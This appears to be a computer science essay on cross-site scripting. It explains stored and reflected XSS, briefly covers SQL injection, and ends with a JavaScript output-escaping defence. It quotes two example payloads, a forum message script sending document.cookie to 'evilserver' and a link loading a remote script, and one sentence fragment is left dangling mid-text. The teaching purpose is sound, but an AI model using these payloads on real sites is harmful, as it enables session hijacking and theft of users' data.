XSS Web Vulnerability Identification Protection Computer Science Essay


As social networking sites proliferate across the World Wide Web, complex user-created HTML content is rapidly becoming the norm rather than the exception. User-created web content is a notorious vector for cross-site scripting (XSS) attacks that target websites and confidential user data. In this threat climate, mechanisms that render web applications immune to XSS attacks have been of recent research interest. Cross-site scripting (XSS) is a common security problem of web applications in which an attacker injects scripting code into the output of the application that is then sent to a user's web browser. In the web browser, this scripting code is executed and used to transfer sensitive data to a third party. Today's solutions attempt to prevent XSS on the server side, for example by inspecting and modifying the data sent to and from the web application. For social networking sites the criticality of XSS attacks is even higher, because attackers can mount more socially engineered attacks in which the target user is fooled into thinking that an attack link comes from a 'friend'. This research work focuses on defense mechanisms for cross-site scripting attacks. We discuss several recent real-world XSS attacks and analyze the reasons why filtering mechanisms failed to defend against them. This thesis describes and implements ways of identifying XSS vulnerabilities in Web 2.0 based websites; suggesting ways to prevent such loopholes is also part of this thesis.



The web today has evolved and is still growing at a rapid pace. Complex business applications are now being delivered over the web, and more and more people use the web every day. Many social networking sites have emerged as a result of this rapid growth. As more and more data, both secure and insecure, is available on the net, it raises a serious concern about the security of cloud computing, social networking and other websites in general. Cyber criminals have become highly effective in stealing data and getting away with it, which makes organizations and businesses around the world more and more vulnerable to cyber crime attacks. Attackers have found new attacks to exploit vulnerabilities in web applications. Among these attacks, cross-site scripting has received much attention in the recent scientific literature. Cross-site scripting (XSS) attacks are the number-one security threat on the Internet today. These attacks breach confidentiality of sensitive data, undermine authorization schemes, defraud users, defame web sites, and more. Notably Facebook, LiveJournal, MySpace and Orkut have all been hit by these attacks.

Many web sites use open source web applications to provide certain services that are part of the web site. Web applications are not only used by private web site providers but also by companies and governmental institutions. If web applications are used to assemble web pages, the information contained in them can be gathered from various sources. One of the most important sources is data from the interaction of the user with the web page. The user clicks on links to decide which page is to be displayed next, requests information, leaves messages by filling out forms, or searches for something on the web site. Most often a database is used as the primary resource to retrieve information that is requested by the user.

To extract personal information from the web application, "SQL injection" can be used. In this kind of attack, information that is entered by the user is included in database queries that are used to extract content for the web page. Because the user input is not checked for malicious content, arbitrary SQL queries can be executed. These queries can then be used to circumvent safety procedures incorporated in the web application (e.g., bypass logins), retrieve personal data of customers (e.g., credit card numbers, social security numbers) or execute system commands on the targeted web server (e.g., to install malicious software on the server).

To use the web application as a platform to attack users, a special kind of attack called "Cross Site Scripting" (XSS) can be performed. Similar to the SQL injection scenario, malicious code is included in the information entered on the web site. The web application processes this information without checking it for HTML or scripting code and inserts it into the output of the web page that is delivered to the attacked user. The web browser (e.g., Mozilla Firefox) then displays the content of the web page and executes the malicious code in the context of the web site. The malicious program can therefore access sensitive data stored in the user's web browser (e.g., a cookie that can be accessed with document.cookie) and transfer it without notice to a third party (i.e., a web site that is under control of the attacker). The attacker can thus collect the information gathered by the script.

Fig.1 Interactions during a cross-site scripting attack

There are two methods for injecting code into the web page that is displayed to the user:

Stored XSS

Reflected XSS

Stored XSS Attack:

With a "Stored XSS" attack, the attacker stores malicious code in the web application. Later, the victim requests the page that contains this scripting code. A web-based bulletin board system (e.g., phpBB [52]), where people can enter messages that are displayed to anyone interested in reading them, can be used to implement this kind of attack. The attacker crafts a message such as the one in Figure 1.1, which contains the malicious JavaScript code, and the bulletin board system stores it in its database. A victim reading the message downloads the scripting code of the attacker as part of the message. This code is executed in the web browser of the victim and transfers the cookie of the user to a web server that is controlled by the attacker.

Look at this picture!
<img src="image">
<script>
document.images[0].src = "http://evilserver/image.jpg" + "?stolencookie=" + document.cookie;
</script>

Figure 1.1: Example of a message for the "Stored XSS" attack that transfers the cookie

(e.g., credit card numbers of customers) or they use the web application as an attack vector on the visiting customer.

Reflected XSS Attack:

A "Reflected XSS" attack sends the malicious code back to the user with the help of the web application. To do this, the attacker sends a link to the victim (e.g., by email), similar to the one below:

<a href="http://goodserver/comment.cgi?mycomment=<script src='http://evilserver/xss.js'></script>">Click here</a>

The example above for a "Reflected XSS" attack shows HTML code that contains a script to attack the receiver of the email. If the victim clicks on the link, the vulnerable web application displays the requested web page with the information passed to it in this link. This information contains the malicious code, which is now part of the web page that is sent back to the web browser of the user, where it is executed.

Typically, advisories to prevent cross site scripting require that the web application providers ensure that their deployed software is not vulnerable. This can either be done during the web application development process, by employing software design and implementation methods that produce more secure code, or after the application is already deployed on the web server. In case the web site owner uses third party products, the latest vendor patches have to be applied on a regular basis, or whenever they are published, to protect the web site's users. Unfortunately, it takes time to develop and test a patch for a newly found vulnerability. While the patch is being worked on, the web site visitors are exposed to the threat. Most of the time, it is not apparent to the visitors whether or not the latest patches have been applied to the web application. Therefore, surfers on the Internet are constantly at risk of becoming the victim of a cross site scripting attack.
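The "implementation methods that produce more secure code" mentioned above come down to one rule for the two attacks described in this chapter: user-supplied text must be encoded for the HTML context it is written into before it reaches the browser. The following is an added example, not code from the essay or from any of the products it names; the function names (escapeHtml, renderStoredMessage, renderCommentPage) and the shape of the rendered pages are assumptions for illustration. It feeds the bulletin-board message of Figure 1.1 and the mycomment parameter of the reflected link through a small server-side encoder and checks that neither survives as an executable script element.

```javascript
// Added example (not from the essay): server-side output encoding that
// neutralises both payloads quoted on the page. All names are assumptions.

// Encode the five characters that let untrusted text break out of an
// HTML text node or a quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Stored XSS: a bulletin-board message is read back from the database
// and placed into the page. The body is treated as text, never as markup.
function renderStoredMessage(author, body) {
  return `<div class="post"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Reflected XSS: the "mycomment" query parameter of a request such as the
// one in the emailed link is echoed into the response. It is decoded from
// the URL and escaped before it reaches the HTML; when re-emitted inside a
// URL it is percent-encoded instead, because that is a different context.
function renderCommentPage(requestUrl) {
  const url = new URL(requestUrl);
  const comment = url.searchParams.get('mycomment') || '';
  return `<p>You wrote: ${escapeHtml(comment)}</p>` +
         `<a href="/comment.cgi?mycomment=${encodeURIComponent(comment)}">permalink</a>`;
}

// Check used below: does the rendered output still contain a script element?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed inputs reproducing the two messages quoted on the page.
const STORED_PAYLOAD =
  'Look at this picture!\n<img src="image">\n<script>\n' +
  'document.images[0].src = "http://evilserver/image.jpg" + "?stolencookie=" + document.cookie;\n' +
  '</script>';

const REFLECTED_LINK =
  "http://goodserver/comment.cgi?mycomment=<script src='http://evilserver/xss.js'></script>";

// Stand-alone run: print the rendered (inert) pages.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderStoredMessage('attacker', STORED_PAYLOAD));
  console.log(renderCommentPage(REFLECTED_LINK));
}
```

Note that escapeHtml is only correct for text nodes and quoted attribute values; a value written into a URL (the permalink) goes through encodeURIComponent instead, and a value written into a script block or an unquoted attribute would need yet another encoder. Getting the context wrong is exactly how the filtering mechanisms discussed in this thesis fail.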